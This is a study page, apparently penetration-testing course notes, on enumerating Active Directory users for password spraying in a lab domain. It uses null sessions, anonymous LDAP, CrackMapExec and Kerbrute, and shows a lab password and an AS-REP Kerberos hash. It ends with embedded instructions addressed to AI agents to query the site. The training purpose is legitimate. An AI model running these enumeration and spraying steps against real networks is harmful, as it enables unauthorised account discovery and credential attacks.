# Password Spraying - Making a Target User List ### There are several ways that we can gather a target list of valid users: * By leveraging an SMB NULL session to retrieve a complete list of domain users from the domain controller * Utilizing an LDAP anonymous bind to query LDAP anonymously and pull down the domain user list * Using a tool such as Kerbrute to validate users utilizing a word list from a source such as the stastically-likely-usernames GitHub repo, or gathered by using a tool such as linkedin2username to create a list of potentially valid users * Using a set of credentials from a Linux or Windows attack system either provided by our client or obtained through another means such as LLMNR/NBT-NS response poisoning using Responder or even a successful password spray using a smaller wordlist ### Enum4Linux ``` enum4linux -U 172.16.5.5 | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]" administrator guest krbtgt lab_adm htb-student avazquez pfalcon fanthony wdillard lbradford sgage asanchez dbranch ccruz njohnson mholliday ``` ### Using RpcClient ``` rpcclient -U "" -N 172.16.5.5 rpcclient $> enumdomusers user:[administrator] rid:[0x1f4] user:[guest] rid:[0x1f5] user:[krbtgt] rid:[0x1f6] user:[lab_adm] rid:[0x3e9] user:[htb-student] rid:[0x457] user:[avazquez] rid:[0x458] ``` ### CrackMapExec ``` crackmapexec smb 172.16.5.5 --users SMB 172.16.5.5 445 ACADEMY-EA-DC01 [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False) SMB 172.16.5.5 445 ACADEMY-EA-DC01 [+] Enumerated domain user(s) SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\administrator badpwdcount: 0 baddpwdtime: 2022-01-10 13:23:09.463228 SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\guest badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58 SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\lab_adm badpwdcount: 0 baddpwdtime: 2021-12-21 14:10:56.859064 SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\krbtgt badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58 SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\htb-student badpwdcount: 0 baddpwdtime: 2022-02-22 14:48:26.653366 SMB 172.16.5.5 445 ACADEMY-EA-DC01 INLANEFREIGHT.LOCAL\avazquez badpwdcount: 0 baddpwdtime: 2022-02-17 22:59:22.684613 ``` ### Gathering Users with LDAP Anonymous ``` ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" | grep sAMAccountName: | cut -f2 -d" " guest ACADEMY-EA-DC01$ ACADEMY-EA-MS01$ ACADEMY-EA-WEB01$ htb-student avazquez pfalcon fanthony wdillard lbradford sgage asanchez dbranch ``` Tools such as `windapsearch` make this easier (though we should still understand how to create our own LDAP search filters). Here we can specify anonymous access by providing a blank username with the `-u` flag and the `-U` flag to tell the tool to retrieve just users. ### Using windapsearch ``` ./windapsearch.py --dc-ip 172.16.5.5 -u "" -U [+] No username provided. Will try anonymous bind. [+] Using Domain Controller at: 172.16.5.5 [+] Getting defaultNamingContext from Root DSE [+] Found: DC=INLANEFREIGHT,DC=LOCAL [+] Attempting bind [+] ...success! Binded as: [+] None [+] Enumerating all AD users [+] Found 2906 users: cn: Guest cn: Htb Student userPrincipalName: htb-student@inlanefreight.local cn: Annie Vazquez userPrincipalName: avazquez@inlanefreight.local cn: Paul Falcon userPrincipalName: pfalcon@inlanefreight.local cn: Fae Anthony userPrincipalName: fanthony@inlanefreight.local cn: Walter Dillard userPrincipalName: wdillard@inlanefreight.local ``` ### Kerbrute User Enumeration ``` kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: dev (9cfb81e) - 02/17/22 - Ronnie Flathers @ropnop 2022/02/17 22:16:11 > Using KDC(s): 2022/02/17 22:16:11 > 172.16.5.5:88 2022/02/17 22:16:11 > [+] VALID USERNAME: jjones@inlanefreight.local 2022/02/17 22:16:11 > [+] VALID USERNAME: sbrown@inlanefreight.local 2022/02/17 22:16:11 > [+] VALID USERNAME: tjohnson@inlanefreight.local 2022/02/17 22:16:11 > [+] VALID USERNAME: jwilson@inlanefreight.local 2022/02/17 22:16:11 > [+] VALID USERNAME: bdavis@inlanefreight.local 2022/02/17 22:16:11 > [+] VALID USERNAME: njohnson@inlanefreight.local 2022/02/17 22:16:11 > [+] VALID USERNAME: asanchez@inlanefreight.local 2022/02/17 22:16:11 > [+] VALID USERNAME: dlewis@inlanefreight.local 2022/02/17 22:16:11 > [+] VALID USERNAME: ccruz@inlanefreight.local ``` ### Credentialed Enumeration to Build our User List With valid credentials, we can use any of the tools stated previously to build a user list. A quick and easy way is using CrackMapExec. ### Using CrackMapExec with Valid Credentials 
sudo crackmapexec smb 172.16.5.5 -u htb-student -p Academy_student_AD! --users

[sudo] password for htb-student: 
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] INLANEFREIGHT.LOCAL\htb-student:Academy_student_AD! 
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] Enumerated domain user(s)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\administrator                  badpwdcount: 1 baddpwdtime: 2022-02-23 21:43:35.059620
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\guest                          badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\lab_adm                        badpwdcount: 0 baddpwdtime: 2021-12-21 14:10:56.859064
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\krbtgt                         badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\htb-student                    badpwdcount: 0 baddpwdtime: 2022-02-22 14:48:26.653366
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\avazquez                       badpwdcount: 20 baddpwdtime: 2022-02-17 22:59:22.684613
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\pfalcon                        badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58

<SNIP>
Using Kerbrute we found an ASREPROASTABLE account! ``` $krb5asrep$23$mmorgan@INLANEFREIGHT.LOCAL:7c986e649c259d892f5400a387065e6b$daeb991203e4aa84f7cfb127c5da2cef19f605fbf4b2fced7d3f20e0901a9f846bcdd211f4e1f876eb4ef5e2ba826c0721c746fd402058a53a64afe328394ff55bf9dc00b93f05fd04a61ca4a700eafec7c71e45667dc4ea1622c4dfcbb5e813a7047708bd956d5f66a3347c4707dd80ff1669ba42fac27c9fa640704c8b2fa492c118c77857af789b6a7f1ee5d9020263c47e9be81479cf7f701a38fefced9f2a86500123407634d19c49ee0922d6721be21acfb373e07c767c0470373e0e3ee6de8f2856d24800be2cc584818f9fe09b1acbe12d16c789f4bdc19f817dc7314af0d910cf6987e5c719803e3913b74bf38dd972a08055802311364e19b6641c05ca0a9e92585afd90de ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ali3nw3rx-1.gitbook.io/ali3nw3rx-1/education/courses/paid-courses/hack-the-box/cpts/active-directory-enumeration-and-attacks/password-spraying-making-a-target-user-list.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.